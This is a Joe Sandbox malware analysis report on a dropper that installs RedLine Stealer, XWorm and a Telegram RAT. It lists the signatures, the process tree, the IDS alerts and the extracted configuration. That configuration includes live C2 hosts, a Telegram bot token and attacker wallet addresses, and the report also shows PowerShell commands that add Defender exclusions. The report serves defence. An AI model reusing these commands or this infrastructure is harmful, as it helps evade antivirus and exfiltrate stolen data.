Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ekpb7jn7mf.exe

Overview

General Information

Sample name:Ekpb7jn7mf.exe
renamed because original name is a hash value
Original sample name:4CE2C0836C46C61B588972B56A23D5E2.exe
Analysis ID:1474423
MD5:4ce2c0836c46c61b588972b56a23d5e2
SHA1:939a9f983870df1913acce63ca408bba9789588f
SHA256:05df07e5e365386ae0917e177328bc12a2405a1c4317266127abb6903aac59b3
Tags:exeRedLineStealer
Infos:

Detection

RedLine, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Ekpb7jn7mf.exe (PID: 6356 cmdline: "C:\Users\user\Desktop\Ekpb7jn7mf.exe" MD5: 4CE2C0836C46C61B588972B56A23D5E2)
    • rKPaQokQ.exe (PID: 6480 cmdline: "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe" MD5: DEAD69D07BC33B762ABD466FB6F53E11)
    • wjoqZlIS.exe (PID: 6528 cmdline: "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe" MD5: EAB323FA6C66098BE1068FEF0A03BFF2)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YsrQekGS.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" MD5: 6EA393666ED89F758B30EA5037F5C22A)
      • powershell.exe (PID: 7380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Calculator.exe (PID: 3804 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.88.186.18"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage"}

Threatname: RedLine

{"C2 url": ["pst-child.gl.at.ply.gg:9336"], "Bot Id": "winsc"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\YsrQekGS.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Temp\YsrQekGS.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Local\Temp\YsrQekGS.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8da6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8e43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8f58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x8938:$cnc4: POST / HTTP/1.1
          C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 2 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x133ca:$a4: get_ScannedWallets
                  • 0x12228:$a5: get_ScanTelegram
                  • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x10e6a:$a7: <Processes>k__BackingField
                  • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1079e:$a9: <ScanFTP>k__BackingField
                  00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x8ba6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x8c43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x8d58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x8738:$cnc4: POST / HTTP/1.1
                    Click to see the 15 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    4.0.YsrQekGS.exe.4b0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      4.0.YsrQekGS.exe.4b0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        4.0.YsrQekGS.exe.4b0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0x8da6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x8e43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x8f58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0x8938:$cnc4: POST / HTTP/1.1
                        2.0.wjoqZlIS.exe.900000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          2.0.wjoqZlIS.exe.900000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            Click to see the 2 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, ParentProcessId: 6564, ParentProcessName: YsrQekGS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', ProcessId: 7380, ProcessName: powershell.exe
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, ParentProcessId: 6564, ParentProcessName: YsrQekGS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', ProcessId: 7380, ProcessName: powershell.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, ParentProcessId: 6564, ParentProcessName: YsrQekGS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', ProcessId: 7380, ProcessName: powershell.exe
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, ParentProcessId: 6564, ParentProcessName: YsrQekGS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', ProcessId: 7380, ProcessName: powershell.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, ParentProcessId: 6564, ParentProcessName: YsrQekGS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', ProcessId: 7380, ProcessName: powershell.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, ParentProcessId: 6564, ParentProcessName: YsrQekGS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe', ProcessId: 7380, ProcessName: powershell.exe

                            Snort Signatures

                            Timestamp:07/16/24-21:08:49.732554
                            SID:2852874
                            Source Port:7000
                            Destination Port:49746
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:07/16/24-21:09:07.854397
                            SID:2852923
                            Source Port:49746
                            Destination Port:7000
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:07/16/24-21:07:40.914617
                            SID:2855924
                            Source Port:49746
                            Destination Port:7000
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:07/16/24-21:09:07.853192
                            SID:2852870
                            Source Port:7000
                            Destination Port:49746
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:07/16/24-21:09:00.501675
                            SID:2853193
                            Source Port:49746
                            Destination Port:7000
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Suricata Signatures

                            Timestamp:2024-07-16T21:07:40.914617+0200
                            SID:2855924
                            Source Port:49746
                            Destination Port:7000
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:27.212960+0200
                            SID:2033967
                            Source Port:49745
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Misc activity
                            Timestamp:2024-07-16T21:07:13.916186+0200
                            SID:2848200
                            Source Port:49738
                            Destination Port:9336
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:08:49.732554+0200
                            SID:2852874
                            Source Port:7000
                            Destination Port:49746
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:09:07.854397+0200
                            SID:2852923
                            Source Port:49746
                            Destination Port:7000
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:11.118991+0200
                            SID:2045001
                            Source Port:9336
                            Destination Port:49730
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:08.760906+0200
                            SID:2840787
                            Source Port:49735
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Potentially Bad Traffic
                            Timestamp:2024-07-16T21:09:07.853192+0200
                            SID:2852870
                            Source Port:7000
                            Destination Port:49746
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:07.874705+0200
                            SID:2045000
                            Source Port:9336
                            Destination Port:49730
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:08.324582+0200
                            SID:2046056
                            Source Port:9336
                            Destination Port:49730
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-07-16T21:07:08.868628+0200
                            SID:2835930
                            Source Port:49736
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Device Retrieving External IP Address Detected
                            Timestamp:2024-07-16T21:07:09.279083+0200
                            SID:2835929
                            Source Port:49736
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Device Retrieving External IP Address Detected
                            Timestamp:2024-07-16T21:07:27.532720+0200
                            SID:2045615
                            Source Port:49745
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Misc activity
                            Timestamp:2024-07-16T21:07:27.532720+0200
                            SID:2853685
                            Source Port:49745
                            Destination Port:443
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-07-16T21:07:11.505252+0200
                            SID:2849352
                            Source Port:49737
                            Destination Port:9336
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:27.217238+0200
                            SID:2029322
                            Source Port:443
                            Destination Port:49745
                            Protocol:TCP
                            Classtype:Misc activity
                            Timestamp:2024-07-16T21:09:00.501675+0200
                            SID:2853193
                            Source Port:49746
                            Destination Port:7000
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:08.872910+0200
                            SID:2833693
                            Source Port:443
                            Destination Port:49736
                            Protocol:TCP
                            Classtype:Potential Corporate Privacy Violation
                            Timestamp:2024-07-16T21:07:58.125604+0200
                            SID:2022930
                            Source Port:443
                            Destination Port:49747
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-07-16T21:07:19.836796+0200
                            SID:2022930
                            Source Port:443
                            Destination Port:49739
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-07-16T21:07:08.369249+0200
                            SID:2835928
                            Source Port:53385
                            Destination Port:53
                            Protocol:UDP
                            Classtype:Device Retrieving External IP Address Detected
                            Timestamp:2024-07-16T21:07:02.736165+0200
                            SID:2849662
                            Source Port:49730
                            Destination Port:9336
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:08.182096+0200
                            SID:2849351
                            Source Port:49730
                            Destination Port:9336
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-07-16T21:07:26.559583+0200
                            SID:2033966
                            Source Port:61962
                            Destination Port:53
                            Protocol:UDP
                            Classtype:Misc activity

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Found malware configuration
                            Source: 2.0.wjoqZlIS.exe.900000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["pst-child.gl.at.ply.gg:9336"], "Bot Id": "winsc"}
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackMalware Configuration Extractor: Xworm {"C2 url": ["45.88.186.18"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703"}
                            Source: YsrQekGS.exe.6564.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeReversingLabs: Detection: 95%
                            Multi AV Scanner detection for submitted file
                            Source: Ekpb7jn7mf.exeReversingLabs: Detection: 65%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: Ekpb7jn7mf.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: 45.88.186.18
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: 7000
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: <123456789>
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: <Xwormmm>
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: XWorm V5.6
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: USB.exe
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: bc1qwufsd77xxsjenyytmdlh9m6vv2m04md25fntkd
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: 0x8b3AcA40Aaa31E1C71F0478b556b555EBC8FDf55
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: TRcX5LoWZKep5z7QCqHHpdZEwWXHN9GBbv
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: 6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4
                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpackString decryptor: 6678411703
                            Source: Ekpb7jn7mf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                            Source: Binary string: calc.pdbGCTL source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
                            Source: Binary string: calc.pdb source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
                            Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Ekpb7jn7mf.exe
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00409396 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00409396
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040DD0E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0040DD0E

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49746 -> 45.88.186.18:7000
                            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 45.88.186.18:7000 -> 192.168.2.4:49746
                            Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49746 -> 45.88.186.18:7000
                            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 45.88.186.18:7000 -> 192.168.2.4:49746
                            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49746 -> 45.88.186.18:7000
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 45.88.186.18
                            Source: Malware configuration extractorURLs: pst-child.gl.at.ply.gg:9336
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
